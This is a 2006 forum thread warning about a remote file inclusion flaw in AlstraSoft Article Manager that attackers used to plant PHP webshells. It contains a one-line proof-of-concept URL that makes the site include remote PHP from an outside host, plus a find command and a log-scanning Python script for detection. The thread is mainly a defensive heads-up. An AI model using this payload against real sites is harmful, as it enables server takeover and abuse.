Nasty AlstraSoft Article Manager Exploit Found

Discussion in 'General Discussion' started by LiNUxG0d, Jul 26, 2006.

  1. LiNUxG0d

    Hey all,

    If a user is using AlstraSoft Article Manager, there is currently an exploit which allows the script to INCLUDE any URL on the net. If the URL points to a TEXT version of a PHP script, it will execute it IN the body of the Article Site Manager thus spawning a PHP webshell.

    If you suspect someone is running this, search for these common files in a Linux shell as root or a sudoer:

    find /home -name "mostpopulararticles.php"

    If you find this, please be wary. I've already proven it on two of my dedicated server owners and man, it's nasty. The script kiddies used it and uploaded 4.5 GIGs of DVD RIPs.

    The proof in the pudding:

    http://infectedarticlesite.com/?page=http://somedomain.com/file.txt

    Mods, I hope this is appropriate; we don't have a security section and really, I think everyone should know this exploit exists since my server got hit and our main pipe was crippled with 90Mbit of UDP ping traffic (UDP flood through IRC, planted by the webshell).

    Don't get caught with your pants down folks, stay alert!

    Jamie
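
A defensive check for the request pattern shown in the post above, as an added example that is not part of the original post: it scans web server access logs for query parameters whose value is itself a remote URL. The combined log format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client address and request target from an Apache/nginx "combined" log line (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL is the inclusion pattern from the post.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def remote_include_params(target):
    """Return [(param, decoded_value)] for query parameters whose value is a remote URL."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time so values that were
        # logged double-encoded (%253A -> %3A -> :) are still flagged.
        decoded = unquote(value)
        if REMOTE_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Yield (client_ip, param, value) for each suspicious request in the log lines."""
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        for name, value in remote_include_params(target):
            yield client, name, value


# Constructed sample log lines (documentation IP ranges, .example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Jul/2006:10:01:02 -0400] "GET /?page=http://files.example/file.txt HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.11 - - [26/Jul/2006:10:01:09 -0400] "GET /?page=articles&id=7 HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.7 - - [26/Jul/2006:10:02:30 -0400] "GET /index.php?page=hTTp%3A%2F%2Ffiles.example%2Ffile.txt%3F HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [26/Jul/2006:10:02:41 -0400] "GET /?page=http%253A%252F%252Ffiles.example%252Fs.txt HTTP/1.0" 200 5120 "-" "-"',
    '203.0.113.5 - - [26/Jul/2006:10:03:00 -0400] "GET /search.php?q=how+to+use+http HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client}  {name}={value}")
```

Legitimate redirect or link-tracking parameters that carry a full URL will also match, so treat hits as leads to review against the account's installed scripts rather than as confirmed compromises.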
     
  2. chirpy

    It isn't really appropriate to these forums unless it is for a script that's provided by cPanel. There are exploits published for all sorts of script applications daily. If people want to keep up with them they should subscribe to the likes of Bugtraq.
     
  3. LiNUxG0d

    Ok Jonathan,

    Just wanted to provide a heads up for preventative purposes.

    My apologies, sometimes I get overly concerned with others' security. ;) I'll stick to mine.

    Hehehehe,

    Jamie
     